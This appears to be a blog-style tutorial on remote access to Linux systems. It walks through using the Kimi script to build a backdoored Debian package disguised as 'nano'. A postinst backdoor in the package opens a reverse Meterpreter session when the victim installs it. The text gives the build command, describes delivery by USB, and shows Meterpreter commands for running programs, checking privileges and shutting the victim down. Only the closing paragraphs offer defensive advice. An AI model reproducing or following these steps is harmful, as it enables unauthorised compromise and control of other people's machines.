Welcome back today we will be talking about Remote Access of machines running on Linux Operating Systems.
Why would someone want to Target a system running on Linux?
Over 60% of all web servers around the world are running variations of Linux and a lot of personal Computers & Smart Phones. Let us just say Linux is everywhere from Traffic Lights to thermostats. Linux is now finding its way onto televisions, and even cars. As software creeps into practically every aspect of our lives, so does the OS designed by Linus Torvalds.
An attacker would target a Web Server or Personal System to gain remote access and gain a Shell this would allow an attacker to edit modify delete and execute processes from the target system as well as carry out further attacks.
Kali Linux (Attacker)
Computer running Linux Operating System
What is Kimi?
Kimi is a script that generates a malicious Debian package for Metasploit
which consists of a bash file. the bash file is deployed into “/usr/local/bin/” directory.
Backdoor gets executed just when the victim tries to install deb package due to postinst file
The Bash file injects and also acts like some system commands when executed by the victim the attacker with be granted access to a remote session.
Lets start open up a new terminal and run kimi.py Python script.
Now we know that our script is working its now time to set reverse ip address and choose a version for our malicious Debian package.
To find your local ip address use command ifconfig from your terminal.
Now we know what our local Ip Address is we can use this to configure our malicious payload.
In a terminal run kimi.py with these options replacing the IP Address with your own local ip address.
sudo python kimi.py -n nano -l 192.168.43.49 -V 1.0
What this command does is runs kimi and tells the script to build a malicious.DEB package of nano version 1.0.
After the script has finished creating the malicious.DEB file it will then spawn Metasploit Framework in XTerm.
Now move the malicious payload across to the victim machine. I will be using a USB thumb drive and the Operating system I’ll be targeting is (Linux Kubuntu 64bit). however, you can use what ever Linux Operating System you like considering it accepts building Debain Packages. Use what ever method suits your situation best for delivery of the payload.
Use dpkg -i to install the malicious package from the victim machine however you can double click the package to install it if you like.
I’ll install my .DEB package with sudo rights.
sudo dpkg -i <deb-package>
Tip: (remember in Linux sudo can be your best friend or your worst enemy.) By the end of this guide, you should understand why.
You can see from the screen shot below we have now established a reverse meterpreter connection with the target machine.
We can now list and connect to an established metapreter session.
To list sessions: session -i
Connection to a session: session -i 1
Now that we have established a metapreter shell we use the help command to list available options on the target machine.
We will now execute a command and start a program on our target machine to achieve this we can use execute command with option -f.
Example: meterpreter > execute -f gimp
This command will execute a process id for gimp and run the software on the target machine.
Let’s say for what ever reason we needed a detailed list of connections on the target network we could use ifconfig to list various information about the target network including Mac Address and Interface names and set various network modes.
We will now get the uid of the established session. This will help us tell if we are running the shell under a root or standard user.
Lets shutdown the target system by executing a shutdown command we can achieve this by using the command execute followed by the shutdown.
Any command that the Linux system allows can be executed by meterpreter including starting and restarting running services.
Always make sure Debian and other packages that require manual install are from a valid source.
Don’t unwillingly install software without thoroughly checking its origin.
Why user Permissions & Restrictions matter
A common error made by a lot of Linux users is running in the root all the time. Most Operating Systems restrict this by prompting the user to set up a secondary user account during the Install procedure and prompt for sudo rights when the root account is needed.
Some Pentesting distros come standard with a Root user account such as Kali Linux it was designed to be run from a USB Pendrive and was never intended to be run as a full OS install.
Don’t assume that a hacker could not get a remote connection back to your machine if your running on Linux or any operating system for that matter any Operating System is careful when installing packages and using root privileges.